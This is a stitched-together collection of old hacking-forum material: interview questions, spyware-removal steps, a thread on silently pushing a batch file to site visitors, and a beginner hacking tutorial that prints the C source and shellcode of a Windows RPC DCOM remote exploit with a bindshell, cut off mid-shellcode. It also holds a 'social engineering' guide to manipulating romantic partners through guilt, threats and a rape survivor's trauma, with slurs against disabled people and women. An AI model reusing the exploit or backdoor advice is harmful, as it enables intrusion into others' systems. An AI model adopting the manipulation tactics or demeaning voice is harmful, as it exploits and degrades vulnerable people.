UDP is a datagram protocol, which means it does not have to establish a connection to another machine before sending data.

- Difference between Telnet and SSH.
Telnet—Telnet is a TCP service that operates on port 23. Telnet enables a client at one site to establish a session with a host at another site. The program passes the information typed at the client's keyboard to the host computer system. Although Telnet can be configured to allow anonymous connections, it should be configured to require usernames and passwords. Unfortunately, even then, Telnet sends them in clear text. When a user is logged in, he or she can perform any allowed task. Applications, such as Secure Shell (SSH), should be considered as a replacement. SSH is a secure replacement for Telnet and does not pass cleartext username and passwords.


- How does SSH encrypts the data?
- Explain how fragmentation occurs within a network.
- Define Malware?
- What is a sniffer and what is it used for?
- What is Netcat and what is it used for?
- What is a Buffer Overflow and what is it used for?
- The interviewer drew a diagram on a piece of paper consisting of two machines in a LAN, a Gateway and a Web Server in the Internet hosting a financial site via HTTPS. Explain how an attacker (Machine A) could sniff traffic from victim (Machine B) and is the attacker able to see the encrypted data and how was this accomplished. How can the victim know that he was being attacked by the attacker?

Scanning for spyware - Steps

 Scanning for spyware.Steps .

1.Normal mode scan for viruses.
2.Safe mode scan for spyware:
     a. antivirus.com
    b.utilities(Spybot search and destroy,Spyware doctor,Webroot Spysweeper,etc).
    c. empty the Temp folder,Internet Temporary Files,cookies.
    d.make sure that System Restore is OFF .
3.Use Hijackthis.
4.If several users are on computer,scan each of them separately.
5.Some programs may not work after spyware removal.
6.Make sure the spyware and antivirus signatures are updated.
7.Defrag and check for errors the hard drive.
8.Check again in normal mode for Spyware.
9.Enter the registry and remove them manually(CAUTION: Make a backup of the registry first).
10. Internet Explorer toolbar spyware utility install it.
11.Use Windows Defender from Microsoft( Needs Service Pack 2).
12.Check the HOST file to see if it has been hijacked.
13.Use msconfig.

Social Engineering Tutorial

 Social Engineering Tutorial

    In essence, by definition, Social Engineering is the act of manipulating people into performing actions or divulging confidential information. When it comes down to being a hacker, social manipulation is a key factor in pulling off what your desired outcome will be. Of course you cannot feel sorry for your victim and still expect manipulation to be successful. Reason is simple, when you tell the truth for example, are you hesitant, and shaking while on brink of utterly shitting your new jeans you just bought? i would hope not. For most people, when they tell the truth, they are confident and straightforward. The person uses piercing eye contact, and their body expresses and open book of interest. What do i mean? When telling the truth, usually the person uses body language to aid him/her in explanation to the person. This is a major plus because of the fact that you are feeding yourself with attention by expressing yourself with body language as if your telling a near death life experience. If you ever told a serious story, i highly doubt you stood there looking at the floor in monotone voice saying,"Well, i almost died today." Pay attention to your tone of voice, eye contact and

    body language as these are important roles in manipulation. When you manipulate, you are telling the truth. Yes you read correct and no i'm not talking out my ass. Think about it, what does it mean to tell the truth? it means confidence. You can't expect someone to believe you if your nervous and trying to explain to them that it wasn't you who stole the last cookie in the jar. If you are nervous, you are an open book of suspicion. This tells the person that you know what you did was wrong, and as a result you feel guilty for being confronted with such notion. But on the retrospect, if you are bold like the tiger in Chinese mythology, people will see you as more of telling the truth because you have nothing to hide, wink wink.

    With that in mind, there is more. Manipulation has everything to do with psychopathology of the victim as well as with the manipulator. You ready for this? reverse psychology. I would hope you all have heard of this before at some point in your life. Reverse psychology is getting the person to conform to your will by the opposite request. If someone tells you to go do your homework, naturally our going to feel a bit compelled for rebellion. Now, if someone said, "You know what, don't do your homework because i know you're lazy." You could feel this is true, so to defend yourself from such negative attack, you will do the opposite to prove them wrong. OR you will know this is wrong, so to show them you are truly not as they suspect, you will end up doing the homework anyways. Point in example: I take care of the "mentally challenged" and don't ask me how do i like it because i'll tell you right now i hate the very forethought of dealing with the profoundly stupid people. The one i take care of is a rebellious little punk, and he doesn't listen to anything unless it benefits him. So, here is where the reverse psychology comes into play. I say, "Fine, I guess you don't want to go swimming then since you don't want to be good. No problem, i'll go swimming since it's so hot outside, and i will enjoy the cold water. Looks like you will be the only one who wont enjoy it since you want to be bad." Suddenly, he goes from being the rebellious punk to the ass kisser all because of the power of verbal usage. This doesn't just apply to stupid people, it applies to everyone to some extent or another because we all want to get our own way in social situations. To dumb it down, were no better than that screaming 10 year old next door who wants that last piece of cake before supper. Only as we get older we tend to succumb to denial, and call it maturity. Another thing that is important is provoking a dominant position. In the animal kingdom-yes including us, we all want to appeal to others as the alpha male superior. Some people can pull this off easier than others because of what has been deemed to be intimidating, ex: tall over being a midget, body builder over being overweight, etc. In Social Engineering, you must take this stance to cause any effect. The inferior will always obey the superior. It's the natural order of life, and it will never change. Let's raise their expectations as well shall we? of course. Here is an example, "Okay, you don't have to go out with me, but if you don't you will always wonder if you would of found that true happiness that you have been longing for your entire life. I know you're going to date someone else, and chances are you are going to get hurt just like before. When you do, you are going to think of me and say, i wonder if i should of went with him instead to find what i want in my life and find happiness.." Then you can elaborate, "So, sine you know this is true, do you really want to go down that road and take that chance, or would you rather be with me where you know that you will be happy for once? " The concept raising expectations in the person is to spark their imagination and give them something to think about. Of course you want to choose your words carefully so that it always makes you look like the good guy, and any chance they make other than what you want will always be negative. To take it further, if for example a girl has been raped, you can say, "You don't want to go with him because he seems to be that kind of person that forces himself on people and that's not good. I don't believe in forcing myself on people, i think there should be shared union between both people in the relationship." See, you choose your words carefully making yourself look like the good guy, while making any other choice a dire consequence. I want to now talk about a beautiful thing called "guilt". In fact, guilt can suck if your the one who feels it, but what of the other person? it can work wonders. Here is another example, "Okay, no go ahead with your friend, i'll just stay home and maybe ind a movie to watch by myself.." It's called playing the victim. It goes with social engineering to a key because while the underlying factor is that you want to leech what you can from your victim, it leaves the victim feeling hopeless, and guilty. What do you do to avoid feeling guilty since were not bad people, we feel guilt. To avoid such feelings of overbearing disgust, we give in. Now for some people like myself included this is no content. But, for some it is and it will take awhile to work at perfecting. Lets see, what about exaggeration and it's importance? exaggeration is important along with everything else i cover in this tutorial because to be interesting and convincing, you need to elaborate with your words. Exaggerate the situation, instill guilt by making yourself the victim. Again another example, "I swear to you it was raining so hard you could hear it pounding on the windshield, and my wipers were on max power but it wasn't good enough. I'm a good driver, but because the rain made the road wet, and i couldn't see anything in front of me, the car flipped over countless amount of times, and my body was thrown like a rag doll from the vehicle smacking my head onto the concrete and started losing consciousness from the impact. I only had one thought that popped into my mind from the fear of dying, and it was you. " The use of imagery provokes emotion because the listener imagines this and tries to sympathize by actually seeing this happen. This is helpful for when you want something from your victim as well. Now take that and compare it to a non-exaggerated story, "Well, it was raining outside and it was hard to see. The car ended up flipping and i fell out, and ended up in the hospital." See my point? if not, re-read it before you move on.

    To wrap this tutorial up, i will add that to pull all this off, you must play the Narcissist. Yes, the pathological self absorbed, greedy, manipulating ever so "innocent" person that takes all and gives nothing back. The Narc' is the perfect being in his mind who he feels everyone should respect him. Everyone who doesn't has the problem and he is completely innocent from anything he does. He is the charmer, social engineering his way to the top to take all and give nothing back unless it makes him look good. He is absent from guilt, and his quench for power makes him ruthless and unstoppable. He is the chameleon in every situation because he adapts to the situation at hand to get what he wants from the victim. He will toy with emotions, and play the victim and stop at nothing until his goal is achieved flooding himself with narcissistic supply or positive attention that he craves. When i say adapting to the situation, i mean just that. Step outside yourself for a second and learn all you can from your victim so that you can play the perfect person in their eyes, or that best friend, or whatever so that you can use that against them later down the road as an attack method to get what you want from them. After all, no one wants their "best" friend to reveal their darkest secrets, so what do they do? they give in. Now you may be wondering, who will this work for? i can say anyone who is reading these very words that i am typing out to you. Okay great! now who will this fail? the paraplegic that has to use that electronic monotone voice command button to speak. "WOMAN.GO.MAKE.ME.A. SANDWICH. SANDWICH. SANDWICH.THIS-THING-WONT-STOP.HELP.OVERLOAD. SANDWICH."

    Now, have you ever seen that hot girl who is dating some over weight guy, with the bald patch, and you just know he's miserable in bed and cannot wait to open up that bag of cheetos when he gets home? We all have trust me. Now why wont she date you instead? I'll tell you. Woman want that absurd fantasy life where the prince rides on the golden path of righteousness on his white stallion out of his way to rescue the infamous woman to wed and make the next princess of the land for ever and ever. This is not how life is. But, to the woman, it is. The woman wants that special someone that stands out amongst the rest and yet knows will take care of her, worship her, buy her materialized possessions (Diamonds-that will shut her up), someone to always give positive reinforcement for their failures and even positive comments on their atrocious looks in the morning. They will settle for less as long as they are provided with this. They are very emotionally insecure, so to keep from feeling so helpless, they seek out their hopeless romantic endeavor; even if it means settling for the fat guy first in line at the lunch-eon. The woman wants reassurance and guidance, and they want security. How do you go about providing that? well you are reading a social engineering tutorial are you not? so get busy! first off, woman want emotional connection on that princess meets prince level. So, start off by casually introducing yourself to her by saying,"Hey, how are you?" NOT "Hey, what's up?" The latter works best because it tells her, you are more interested in how she is feeling rather than what she is doing. Of course asking what she is up to is perfectly fine, after you wow her with your amazing skills in Social Engineering. From there, put on a mask of the prince, that one she's been longing for her whole life. How? engage in conversation and ask her key questions on what she looks for in a man. After much valuable info has been gathered, guess what you get to do? plat the narcissist. Adapt to the role she is looking for, and kiss her ass from time to time. Once she realizes you are the "one", that perfect ever omniscient man she has been longing for, you can start to slack off. Because as said before, once you raise her expectations and she sees you as a perfect person for her, you can slack off by doing more of what you want, or get her to do more of what you want from her. If she dislikes the concept, manipulate her into doing so. You can do this by threatening to not talk to her ever again. This will scare her because the last thing she wants to do is lose the best thing that has ever happened to her.


Old Mad Hacking Skills

 
lernerdude
Nov 5 2006, 12:46 AM
how do i put a batch file i made on my website so that it automaticaly downloads without them knowing? i no i no batch file r gay and nooby but ima noob and i cant do c/c++ programing. so how do i make it so that it automaticlay downloads and opens?

any help is apreciated plz & TY!
sekio
Nov 5 2006, 12:53 AM
aside from browser exploits you cant
Nitrogen
Nov 5 2006, 02:25 AM
<img src="http://mywebsite.com/files/gaybatch.bat">

Of course it's an image tag, that should still download the .bat to see if it's an image..however it'll be useless once downloaded into the cache because the user wont know about it and will never be executed.

Nitrogen.
---------------------------

Aug 19 2006, 01:43 AM
Nublet’s hand manual….to WINHACK – v. 1
From a newbie.. to a newbie biggrin.gif

By DaBuKe

[This is my first tutorial EVER.. so don't bash me even if it's awful... hope this contributes though]

This Text is only for educational purposes only and I am not responsible for YOUR actions.

Personal Comments: Well… basically, I thought I’d make a tutorial about hacking, cracking, types of web hacking and things so that new people would stop SPAMMING rohitab and refer to this to learn. This doesn’t have much advanced stuff (because I don’t know much advanced things) so this thing will cover the basics and fundamentals of hacking. (Usually hacking a windows computer. Especially XP) Please, you can distribute this tutorial anywhere, but give due credit to me. biggrin.gif If you would like to add/update something, or correct a misconception here, please e-mail me at da_park91@hotmail.com. (NO SPAM PL0X)
Or just PM at Rohitab.com/discuss

1. The Basics
1.1 What is an IP?
1.2 How to obtain an IP – via domain, messengers
1.3 Proxies
1.4 Ports – what are they?
1.5 Backdoors – the script kiddie way (>:3)

2. The Art of Hacking
2.1 Introduction
2.2 Information Gathering
2.3 Finding a Vulnerability (by portscanning, Vuln. Scanning, Banner Grabbing)
2.4 Using the vuln. To gain access( EXPLOITS :DDDD)
2.5 Planting a Backdoor/RAT for later use
2.6 Automated Penetration Testing


3. Credits/ Site Reference


HERE IT GOES!!11!1! BAM

1. The basics
1.1 What is an IP?

IP, in other words Internet Protocol, is a set of unique numbers that signifies the address of a computer or a server connected to a network. Every network-relating device must have an IP address – i.e. 104.23.60.3. Internet Protocol Address is made up of four numbers in the range of 0 to 255.

Basically, and IP address is like the address to your house. You need this IP so that the internet or the network knows where to send the data to.

There are two types of IPs (for basic ones). Static and Dynamic. Static IPs are literally static: they don’t change. The Static IP assigned to a computer will FOREVA stay the same way unless of course YOU change it.(or the owner) Dynamic IPs are one that are assigned each time you connect to the internet. The ip address is not consistent and it will always change.

1.2 How to obtain the IP address – via messenger, domain

If you have an internet address (URL) of a site, and you want to find out their ip, you can simply ping them. Open up a command line, type “ping thewebsite.org”, and below, it informs you with the ip it’s pinging.

For grabbing the ip of a messenger user, there are different ways.
For msn messenger, just netstat –na wont help you, because that will only show the server not the person’s computer. DO netstat WHILE transferring files. This will show the ip of the person you’re sending the file to. (of course, port 1863)
For AIM, I believe just a netstat anytime is sufficient. =D

1.3 Proxies

Anonymity is an important part of a hacker’s job, because often, even white hat hacking, can include very illegal things. Proxy is a way of keeping anonymity. Proxy is a server out there that you can connect to to connect to the internet anonymously.(riddles D:) Setting up a proxy is very simple(for IE, Firefox and stuff). Just go to Tools, options, general, manual proxy settings for firefox. For IE, go to tools, internet options, connections, lan settings.

What to put in the box? Go to this website, choose an ip (anonymous provider one), fill the box.
http://www.samair.ru/proxy/
http://www.publicproxyservers.com/

1.4 TCP ports

what is a port? Basically, it is a door or a window to a computer through which applications and software make connections and send/receive data/info. For an example, the internet explorer uses port “80” to transmit an accept packets in which the data is stored in. Each port has a different , specific use.

For a list of description of each port, check this site:
http://www.iana.org/assignments/port-numbers

1.5 Trojans

Trojans. The twenty first century’s Skiddie-tool. Trojans are available to everyone now, and if you are trying to learn how to hack, you have used a Trojan at some point. It is somewhat easy to use, but it is a weak way of hacking. What people do with it nowadays is just send the infected file to a person and just tell them to open it. That’s it. No exploits, no vulnerabilities just plain, social engineering.

However, Trojans were not made in purpose of this. Trojans(Backdoors/RAT) were made so that when a person break’s into a computer, a server or a network, they could plant this “backdoor” so later on, they could easily get in again.

What Trojan does is they open a “back door” or a secret door for the hacker so that they can sneak in with out having to go through the trouble of hacking in.


There are two parts of Trojans : Server / Client
The server file is the infected file, which when executed, will open the back door and make the system vulnerable. Client file is the file that communicates with the server to control the infected file. Depending on how the server is programmed, the client can control the computer. The server might open up a shell for you, or give you admin privileges. The possibilities are infinite.

However powerful these program might be, if these programs are public ones : like sub7, netbus, schoolbus, optix pro: it will easily be detected by any AVs available (even the free ones D:) so what should we do? Program your own.

But still, here is a site that keeps many Trojans and tools : http://library.2ya.com

2. The Art of Hacking
2.1 Introduction

In this section of the tutorial, I will teach you the basics of hacking into a computer, in the purpose of WHITE HAT HACKING. White hat hacking is hacking into servers or computers to find and report the vulnerabilities of a server so that the administrator of the server can patch up the vulnerability. You should not cause ANY harm when white hat hacking. Get in, raise your access level to the highest, get out, and report to the owner of the server/computer or w/e. Tell them the vulnerabilities and exploits you used so that they can patch their server, and this will help this world become more secure biggrin.gif









2.2 Information Gathering is perhaps one of the most important steps of hacking.

It is gathering information on the server/computer you are targeting : pinging, port scanning, banner grabbing, etc.


Pinging : This is the most basic form of checking if the host you are about to attack is alive. Simply, go to the command prompt, and type “ping thetarget.org” or the ip, “ping 127.0.0.1” (by the way, 127.0.0.1 is a loop IP, and it is always your OWN IP) Of course, without the quotes. If it returns ANY of the packets sent, then IT IS ALIVE. Even if you send like 100 and it returns 1, that still means it’s alive(or was alive tongue.gif)

Port Scanning : Port scanning is scanning a computer to check if any ports are open. Port scanners usually return with the information of if the host is alive, what ports are open and what ports are closed/not responding. And also, many port scanners banner grab the open ports for you. Banner grabbing is a technique used to grab the software information that is running on the port. For an example, let’s say we scanned a box and we found out that it had port 135, 139, 445 open. We can guess from this info that it is running windows with RPC.

Good port scanners are : NMAP, Blues Port Scanner, SuperScanner. Find moreon google biggrin.gif

Vulnerability Scanner : There are scanners out there with the options portscanning and vulnerability scanning. Vulnerability scanning will scan the computer’s softwares and ports for any weak signs and vulnerabilities and creates a list of them for you. Using this list, you can find the correct exploits to compromise the server/computer. Most of these Vuln. Scanners are very expensive.. ranging from 200 dollars (US) to 12000 dollars. (Thus no script kiddie or a nub can have them) but.. *cough* warez *cough*. If you are GOOD enough and know how/where to search for those programs… You will be able to get your hands on them.

If you can get one.. :Shadow Security Scanner, XSpider

These steps are necessary to gather enough information to find weak points and vulnerabilities. It’s like getting the blueprint of the bank you want to rob. What idiot would try to rob a bank without any info about it?



2.3 Finding the vulnerability/exploit

If you did get your hands on a nice vuln. Scanner, this will be much easier for
you. However, before looking for any exploits, you should try to understand what the hole is in the system, and how the exploit tries to compromise the system. (Thus learning from the programs and things you use) Exploits, nowadays, are very easy to get since the internet is like a sea of information. There are thousands of website with millions of exploits. Now, the only thing you have to do to find an exploit for a specific target is just type in the software you want the exploit for in google, and VOILA. You get hundreds of web pages.
Here is a list of websites with very, VERY useful information on computers, vulnerabilities and exploits.

http://www.metasploit.com/
http://www.milw0rm.com/
http://www.securiteam.com/exploits/
http://www.iss.net/security_center/advice/...its/default.htm
http://zone-h.com/
http://www.antiserver.it/
http://www.frsirt.com/exploits/
http://packetstormsecurity.org/
http://exploits-lab.info/index.php
http://archives.neohapsis.com/archives/fulldisclosure/
http://d3fonix.uni.cc/
http://www.cert.org/nav/index_red.html
http://www.governmentsecurity.org/exploits.php
http://www.hoobie.net/security/exploits/
http://www.hackemate.com.ar/exploits/
http://www.insecure.org/sploits.html
HTTP://WWW.GOOGLE.COM



However, I’m pretty sure NONE of these sites will produce you with 0day, non-published, private exploits.(since if you put it up on these websites, it will be public tongue.gif)
So most likely, the only way of hacking into a system with fully updated, patched softwares and vulnerabilities, is you on your own finding out a new exploit.(which can be quite hard sometimes) To find out an exploit, you need to learn how to program, and learn how things work with computers. For questions regarding this, visit
http://www.rohitab.com/discuss
This site is VERY useful for programming, virii-creating, computer-regarding questions. Very VERY VERY ZOMG VERY intelligent, helpful people there. [emphasize on very and intelligent]

2.4 Exploits, using vulnerability

Now, what do we do with the exploit codes found on these websites? To some of you, these codes might look like gibberish (some of them look gibberish to me too D: cause I’m also a nub at programming perl, php and stuff). These codes are you weapons(I should say) because these are the codes that use the vulnerabilities to gain access to a system. You still don’t know what to do with these codes?

Well, it is different for each programming language. For example, C/C++ exploit codes, you have to compile. For perl, php, you have to get a processor of this languages. Well, how do you find out what language it’s in? I’m not gonna tell you. Do some research. Study programming languages(at least a bit so that you can find out what language its in.. if you can’t figure that out, throw your computer away RIGHT NOW) So compile/process the code to use it.

What exactly are exploits? “In computer security, an exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to gain control of a computer system or allow privilege escalation or a denial of service attack.” Quoted from wikipedia. You have to learn how to classify an exploit. Is it local? Remote? Privilege escalation? Access? Buffer overflow? Denial of Service? I’m too lazy to do all the research and explanation for you. Look up information on exploits on the web, read, read, read. Read. And read, read. AND THEN READ MORE. That’s the only way. READ, not babble.

Here is an example code of an exploit(RPC DCOM exploit for windows XP, 2000):
CODE
/* Windows remote RPC DCOM exploit
* Coded by oc192
*
* Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
* ExitThread in its shellcode to prevent the RPC service from crashing upon
* successful exploitation. It also has several other options including definable
* bindshell and attack ports.
*
* Features:
*
* -d destination host to attack.
*
* -p for port selection as exploit works on ports other than 135(139,445,539 etc)
*
* -r for using a custom return address.
*
* -t to select target type (Offset) , this includes universal offsets for -
* win2k and winXP (Regardless of service pack)
*
* -l to select bindshell port on remote machine (Default: 666)
*
* - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus
* preventing crash of RPC service on remote machine.
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
/* xfocus start */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
x00,
0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* end xfocus */

int type=0;
struct
{
char *os;
u_long ret;
}
targets[] =
{
{ "[Win2k-Universal]", 0x0018759F },
{ "[WinXP-Universal]", 0x0100139d },
}, v;
void usage(char *prog)
{
int i;
printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
printf("Usage:\n\n");
printf("%s -d <host> [options]\n", prog);
printf("Options:\n");
printf(" -d: Hostname to attack [Required]\n");
printf(" -t: Type [Default: 0]\n");
printf(" -r: Return address [Default: Selected from target]\n");
printf(" -p: Attack port [Default: 135]\n");
printf(" -l: Bindshell port [Default: 666]\n\n");
printf("Types:\n");
for(i = 0; i < sizeof(targets)/sizeof(v); i++)
printf(" %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
exit(0);
}

unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"
"\xff\xff\xff\xff" /* return address */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
/* bindshell no RPC crash, defineable spawn port */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
